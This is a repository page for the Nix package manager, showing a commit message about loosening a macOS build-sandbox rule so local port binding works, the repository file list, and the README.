No description
Find a file
Andrew Marshall 00f6db36fd libstore: fix port binding in __darwinAllowLocalNetworking sandbox
In d60c3f7f7c, this was changed to close a
hole in the sandbox. Unfortunately, this was too restrictive such that it
made local port binding fail, thus making derivations that needed
`__darwinAllowLocalNetworking` gain nearly nothing, and thus largely
fail (as the primary use for it is to enable port binding).

This unfortunately does mean that a sandboxed build process can, in
coordination with an actor outside the sandbox, escape the sandbox by
binding a port and connecting to it externally to send data. I do not
see a way around this with my experimentation and understanding of the
(quite undocumented) macOS sandbox profile API. Notably it seems not
possible to use the sandbox to do any of:

- Restrict the remote IP of inbound network requests
- Restrict the address being bound to

As such, the `(local ip "*:*")` here appears to be functionally no
different than `(local ip "localhost:*")` (however it *should* be
different than removing the filter entirely, as that would make it also
apply to non-IP networking). Doing `(allow network-inbound (require-all
(local ip "localhost:*") (remote ip "localhost:*")))` causes listening
to fail.

Note that `network-inbound` implies `network-bind`.
2024-08-08 14:31:26 -04:00
.github Merge remote-tracking branch 'origin/master' into flake-regressions 2024-07-22 16:03:45 +02:00
build-utils-meson add werror=suggest-override 2024-07-25 07:41:12 +02:00
config Remove and gitignore the autoreconf generated files 2024-03-02 10:18:47 +01:00
contrib function-trace: always show the trace 2019-09-18 23:23:21 +02:00
doc/manual Merge branch 'master' into rhendric/reference-manual-2 2024-08-07 15:25:02 -04:00
m4 Build a minimized Nix with MinGW 2024-04-17 12:26:10 -04:00
maintainers Factor out lookupExecutable and other PATH improvments 2024-08-07 18:12:58 -04:00
misc lint: fix shellcheck for misc/systemv/nix-daemon 2024-07-14 19:56:03 -07:00
mk makefiles: recognize GNU/Hurd 2024-07-30 05:29:32 +02:00
packaging dependencies: Centralize aws-sdk-cpp and sync with Nixpkgs 2024-07-27 02:16:05 +02:00
scripts Merge remote-tracking branch 'origin/master' into flake-regressions 2024-07-22 16:03:45 +02:00
src libstore: fix port binding in __darwinAllowLocalNetworking sandbox 2024-08-08 14:31:26 -04:00
tests Factor out lookupExecutable and other PATH improvments 2024-08-07 18:12:58 -04:00
.clang-format Factor out lookupExecutable and other PATH improvments 2024-08-07 18:12:58 -04:00
.clang-tidy Add .clang-tidy 2024-02-01 01:01:39 +01:00
.dir-locals.el .dir-locals.el: Set c-block-comment-prefix 2020-07-10 11:21:06 +02:00
.editorconfig No global eval settings in libnixexpr 2024-06-24 12:15:16 -04:00
.gitignore Stop vendoring toml11 2024-06-26 22:27:13 -04:00
.shellcheckrc housekeeping: shellcheck for tests/functional/ca/build-cache.sh 2024-06-12 17:41:16 -04:00
.version Bump version 2024-08-01 10:43:00 +02:00
CITATION.cff chore: PhD thesis as reference in CITATION.cff 2024-05-18 20:05:22 +02:00
configure.ac Add S3 opt dep to Meson, and simplify build 2024-07-22 11:11:38 -04:00
CONTRIBUTING.md manual: Contributing -> Development, Hacking -> Building (#9014) 2024-07-25 02:53:06 +00:00
COPYING * Change this to LGPL to keep the government happy. 2006-04-25 16:41:06 +00:00
default.nix add flake-compat to flake.nix and use sha256 in default.nix 2023-03-06 21:11:24 +01:00
docker.nix fix "add an option to include flake-registry..." 2023-05-16 14:35:31 +02:00
flake.lock Rename pre-commit-hooks -> git-hooks-nix 2024-07-24 15:55:57 +02:00
flake.nix Merge pull request #11170 from NixOS/release-notes-2.24 2024-07-31 17:06:49 +02:00
local.mk local.mk: Solve warnings 2024-04-17 15:37:14 +02:00
Makefile Merge pull request #11180 from Mic92/override-warnings 2024-07-25 03:00:50 -04:00
Makefile.config.in Port C API docs to Meson (#10936) 2024-06-19 22:43:54 +02:00
meson.build Progress on Wine CI support, MinGW dev shell with Meson (#10975) 2024-07-21 22:03:04 +00:00
package.nix package.nix: Empty build inputs if not doBuild 2024-07-27 02:39:55 +02:00
precompiled-headers.h Build a minimized Nix with MinGW 2024-04-17 12:26:10 -04:00
README.md docs: fix link to building instructions (#11207) 2024-07-28 13:34:48 +00:00
shell.nix Remove url literals 2022-01-24 13:28:21 +01:00

Nix

Open Collective supporters Test

Nix is a powerful package manager for Linux and other Unix systems that makes package management reliable and reproducible. Please refer to the Nix manual for more details.

Installation and first steps

Visit nix.dev for installation instructions and beginner tutorials.

Full reference documentation can be found in the Nix manual.

Building and developing

Follow instructions in the Nix reference manual to set up a development environment and build Nix from source.

Contributing

Check the contributing guide if you want to get involved with developing Nix.

Additional resources

Nix was created by Eelco Dolstra and developed as the subject of his PhD thesis The Purely Functional Software Deployment Model, published 2006. Today, a world-wide developer community contributes to Nix and the ecosystem that has grown around it.

License

Nix is released under the LGPL v2.1.